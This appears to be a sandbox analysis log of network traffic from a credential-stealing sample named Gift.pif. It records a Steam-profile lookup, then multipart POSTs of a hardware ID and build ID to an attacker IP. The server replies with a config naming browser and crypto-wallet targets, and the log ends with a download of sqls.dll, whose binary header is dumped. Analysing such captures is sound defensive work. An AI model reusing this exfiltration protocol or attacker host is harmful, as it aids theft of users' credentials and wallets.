                                                                        Data Ascii: c/ebY6RtNW4rOyn7Z0coo1/BbulMrxHJT9K0TvKEzq9qLrTmezdB91fvAWE9I8+sB/RB1xe8n1vjd0tixceXtaZuWOy06eV7S0fdB20+tWYsF0wwu7y4x8r6fXP11Zpe+9HHF9ZFb191xsZkeUHh94aWjoY8z74UfvHjP4MDfM898f/Puj/V/OVdO0kJ/z/kIVr33vAsCTG+951SXubq5zlSOY9cts9uX4/vvlXR4Ci1sYjpn0M
                                                                        Aug 5, 2024 18:56:54.639024973 CEST161INHTTP/1.1 200 OK
                                                                        Server: nginx/1.22.1
                                                                        Date: Mon, 05 Aug 2024 16:56:54 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Length: 0
                                                                        Connection: keep-alive


                                                                        HTTPS Proxied Packets

                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549712104.102.49.249443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:55:49 UTC119OUTGET /profiles/76561199747278259 HTTP/1.1
                                                                        Host: steamcommunity.com
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:55:50 UTC1870INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://*.valvesoftware.com https://*.steambeta.net https://*.discovery.beta.steamserver.net https://*.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https://lv.queniujq. [TRUNCATED]
                                                                        Expires: Mon, 26 Jul 1997 05:00:00 GMT
                                                                        Cache-Control: no-cache
                                                                        Date: Mon, 05 Aug 2024 16:55:50 GMT
                                                                        Content-Length: 34740
                                                                        Connection: close
                                                                        Set-Cookie: sessionid=763569d055cde86fecff0570; Path=/; Secure; SameSite=None
                                                                        Set-Cookie: steamCountry=US%7Cd7fb65801182a5f50a3169fe2a0b7ef0; Path=/; Secure; HttpOnly; SameSite=None
                                                                        2024-08-05 16:55:50 UTC14514INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c
                                                                        Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
                                                                        2024-08-05 16:55:50 UTC16384INData Raw: 64 65 73 74 72 6f 79 57 68 65 6e 44 6f 6e 65 27 3a 20 66 61 6c 73 65 2c 20 27 74 6f 6f 6c 74 69 70 43 6c 61 73 73 27 3a 20 27 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 65 6e 74 27 2c 20 27 6f 66 66 73 65 74 59 27 3a 2d 36 2c 20 27 6f 66 66 73 65 74 58 27 3a 20 31 2c 20 27 68 6f 72 69 7a 6f 6e 74 61 6c 53 6e 61 70 27 3a 20 34 2c 20 27 74 6f 6f 6c 74 69 70 50 61 72 65 6e 74 27 3a 20 27 23 67 6c 6f 62 61 6c 5f 68 65 61 64 65 72 20 2e 73 75 70 65 72 6e 61 76 5f 63 6f 6e 74 61 69 6e 65 72 27 2c 20 27 63 6f 72 72 65 63 74 46 6f 72 53 63 72 65 65 6e 53 69 7a 65 27 3a 20 66 61 6c 73 65 7d 29 3b 0d 0a 09 09 7d 29 3b 0d 0a 09 3c 2f 73 63 72 69 70 74 3e 0d 0a 0d 0a 09 09 3c 64 69 76 20 69 64 3d 22 67 6c 6f 62 61 6c 5f 61 63 74 69 6f 6e 73 22 3e 0d 0a 09 09 09 3c 64 69
                                                                        Data Ascii: destroyWhenDone': false, 'tooltipClass': 'supernav_content', 'offsetY':-6, 'offsetX': 1, 'horizontalSnap': 4, 'tooltipParent': '#global_header .supernav_container', 'correctForScreenSize': false});});</script><div id="global_actions"><di
                                                                        2024-08-05 16:55:50 UTC3768INData Raw: 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 20 63 6c 61 73 73 3d 22 77 68 69 74 65 4c 69 6e 6b 22 3e 56 69 65 77 20 6d 6f 72 65 20 69 6e 66 6f 3c 2f 73 70 61 6e 3e 0d 0a 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 09 09 09 09 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 20 24 4a 28 20 66 75 6e 63 74 69 6f 6e 28 29 20 7b 20 49 6e 69 74 50 72 6f 66 69 6c 65 53 75 6d 6d 61 72 79 28 20 67 5f 72 67 50 72 6f 66 69 6c 65 44 61 74 61 5b 27 73 75 6d 6d 61 72 79 27 5d 20 29 3b 20 7d 20 29 3b 20 3c 2f 73 63 72 69 70 74 3e 0d 0a 09 09 09 09 09 09 09 09 09 3c 2f 64 69 76 3e 0d 0a 0d 0a 09 09 09 3c 2f 64 69 76 3e
                                                                        Data Ascii: uot;clickOnActivate&quot;:true}" class="whiteLink" class="whiteLink">View more info</span></div><script type="text/javascript"> $J( function() { InitProfileSummary( g_rgProfileData['summary'] ); } ); </script></div></div>
                                                                        2024-08-05 16:55:50 UTC74INData Raw: 61 67 65 5f 63 6f 6e 74 65 6e 74 20 2d 2d 3e 0d 0a 0d 0a 3c 2f 64 69 76 3e 09 3c 21 2d 2d 20 72 65 73 70 6f 6e 73 69 76 65 5f 70 61 67 65 5f 66 72 61 6d 65 20 2d 2d 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e
                                                                        Data Ascii: age_content --></div>... responsive_page_frame --></body></html>


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549713188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:55:51 UTC233OUTGET / HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:55:52 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:55:51 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:55:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                        Data Ascii: 0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549715188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:55:53 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----HIIEBAFCBKFIDGCAKKKF
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 279
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:55:53 UTC279OUTData Raw: 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 30 35 31 45 34 39 35 33 43 31 36 32 32 33 35 37 33 34 35 32 36 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 45 42 41 46 43 42 4b 46 49 44 47 43 41 4b 4b 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d
                                                                        Data Ascii: ------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="hwid"3051E4953C162235734526-a33c7340-61ca-11ee-8c18-806e6f6e6963------HIIEBAFCBKFIDGCAKKKFContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------
                                                                        2024-08-05 16:55:53 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:55:53 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:55:53 UTC69INData Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 7c 31 7c 30 7c 31 7c 31 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 3a1|1|1|1|371764cf8efc1b40dfc15a6ff874b301|1|0|1|1|0|50000|00


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        3192.168.2.549716188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:55:54 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----IJDGIIEBFCBAAAAKKEGH
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 331
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:55:54 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 49 4a 44 47 49 49 45 42 46 43 42 41 41 41 41 4b 4b 45 47 48 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------IJDGIIEBFCBAAAAKKEGHContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------IJDGIIEBFCBAAAAKKEGHCont
                                                                        2024-08-05 16:55:55 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:55:55 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:55:55 UTC1564INData Raw: 36 31 30 0d 0a 52 32 39 76 5a 32 78 6c 49 45 4e 6f 63 6d 39 74 5a 58 78 63 52 32 39 76 5a 32 78 6c 58 45 4e 6f 63 6d 39 74 5a 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 64 76 62 32 64 73 5a 53 42 44 61 48 4a 76 62 57 55 67 51 32 46 75 59 58 4a 35 66 46 78 48 62 32 39 6e 62 47 56 63 51 32 68 79 62 32 31 6c 49 46 4e 34 55 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 4e 6f 63 6d 39 74 61 58 56 74 66 46 78 44 61 48 4a 76 62 57 6c 31 62 56 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 45 46 74 61 57 64 76 66 46 78 42 62 57 6c 6e 62 31 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 46 52 76 63 6d 4e 6f 66 46 78 55 62 33 4a 6a 61 46 78 56 63 32 56 79 49 45
                                                                        Data Ascii: 610R29vZ2xlIENocm9tZXxcR29vZ2xlXENocm9tZVxVc2VyIERhdGF8Y2hyb21lfEdvb2dsZSBDaHJvbWUgQ2FuYXJ5fFxHb29nbGVcQ2hyb21lIFN4U1xVc2VyIERhdGF8Y2hyb21lfENocm9taXVtfFxDaHJvbWl1bVxVc2VyIERhdGF8Y2hyb21lfEFtaWdvfFxBbWlnb1xVc2VyIERhdGF8Y2hyb21lfFRvcmNofFxUb3JjaFxVc2VyIE


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        4192.168.2.549717188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:55:56 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 331
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:55:56 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 48 4a 45 48 4a 4a 44 41 41 41 4b 45 42 47 43 46 43 41 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------DGHJEHJJDAAAKEBGCFCAContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------DGHJEHJJDAAAKEBGCFCACont
                                                                        2024-08-05 16:55:56 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:55:56 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:55:56 UTC5685INData Raw: 31 36 32 38 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 75 61 32 4a 70 61 47 5a 69 5a 57 39 6e 59 57 56 68 62 32 56 6f 62 47 56 6d 62 6d 74 76 5a 47 4a 6c 5a 6d 64 77 5a 32 74 75 62 6e 77 78 66 44 42 38 4d 48 78 4e 5a 58 52 68 54 57 46 7a 61 33 77 78 66 47 52 71 59 32 78 6a 61 32 74 6e 62 47 56 6a 61 47 39 76 59 6d 78 75 5a 32 64 6f 5a 47 6c 75 62 57 56 6c 62 57 74 69 5a 32 4e 70 66 44 46 38 4d 48 77 77 66 45 31 6c 64 47 46 4e 59 58 4e 72 66 44 46 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 4d 58 78 70 59 6d 35 6c 61 6d 52 6d 61 6d 31 74 61 33 42 6a 62 6d 78 77 5a 57 4a 72 62 47 31 75 61 32 39 6c 62
                                                                        Data Ascii: 1628TWV0YU1hc2t8MXxua2JpaGZiZW9nYWVhb2VobGVmbmtvZGJlZmdwZ2tubnwxfDB8MHxNZXRhTWFza3wxfGRqY2xja2tnbGVjaG9vYmxuZ2doZGlubWVlbWtiZ2NpfDF8MHwwfE1ldGFNYXNrfDF8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8VHJvbkxpbmt8MXxpYm5lamRmam1ta3BjbmxwZWJrbG1ua29lb


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        5192.168.2.549718188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:55:57 UTC325OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----KJKEHIIJJECFHJKECFHD
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 332
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:55:57 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4a 4b 45 48 49 49 4a 4a 45 43 46 48 4a 4b 45 43 46 48 44 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------KJKEHIIJJECFHJKECFHDContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------KJKEHIIJJECFHJKECFHDCont
                                                                        2024-08-05 16:55:58 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:55:58 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:55:58 UTC119INData Raw: 36 63 0d 0a 54 57 56 30 59 55 31 68 63 32 74 38 4d 58 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 46 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 6cTWV0YU1hc2t8MXx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDF8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb2180


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        6192.168.2.549719188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:55:59 UTC326OUTPOST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----CFCFHJDBKJKEBFHJEHII
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 6425
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:55:59 UTC6425OUTData Raw: 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 43 46 43 46 48 4a 44 42 4b 4a 4b 45 42 46 48 4a 45 48 49 49 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------CFCFHJDBKJKEBFHJEHIIContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------CFCFHJDBKJKEBFHJEHIICont
                                                                        2024-08-05 16:55:59 UTC158INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:55:59 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:55:59 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        7192.168.2.549720188.245.87.202443748C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        TimestampBytes transferredDirectionData
                                                                        2024-08-05 16:56:00 UTC241OUTGET /sqls.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:00 UTC261INHTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:00 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 2459136
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:00 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:00 UTC16123INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1e d2 37 9f 5a b3 59 cc 5a b3 59 cc 5a b3 59 cc 11 cb 5a cd 6e b3 59 cc 11 cb 5c cd cf b3 59 cc 11 cb 5d cd 7f b3 59 cc 11 cb 58 cd 59 b3 59 cc 5a b3 58 cc d8 b3 59 cc 4f cc 5c cd 45 b3 59 cc 4f cc 5d cd 55 b3 59 cc 4f cc 5a cd 4c b3 59 cc 6c 33 5d cd 5b b3 59 cc 6c 33 59 cd 5b b3 59 cc 6c 33 a6 cc 5b b3 59 cc 6c 33 5b cd 5b b3 59 cc 52 69 63 68 5a b3 59 cc 00 00 00 00 00 00 00
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$7ZYZYZYZnY\Y]YXYYZXYO\EYO]UYOZLYl3][Yl3Y[Yl3[Yl3[[YRichZY
                                                                        2024-08-05 16:56:00 UTC16384INData Raw: 00 e9 9c 25 1b 00 e9 3a f0 19 00 e9 9e cd 1e 00 e9 ba 58 1d 00 e9 7e 65 1b 00 e9 1b f0 1c 00 e9 01 21 1c 00 e9 b9 2a 1f 00 e9 d7 46 00 00 e9 92 83 17 00 e9 c5 ed 1e 00 e9 e8 57 03 00 e9 fa 7c 1b 00 e9 3e e1 00 00 e9 bd f4 1a 00 e9 b4 7c 00 00 e9 bf ca 1c 00 e9 4c db 1a 00 e9 31 31 1a 00 e9 34 e5 1c 00 e9 36 f1 1d 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc
                                                                        Data Ascii: %:X~e!*FW|>|L1146
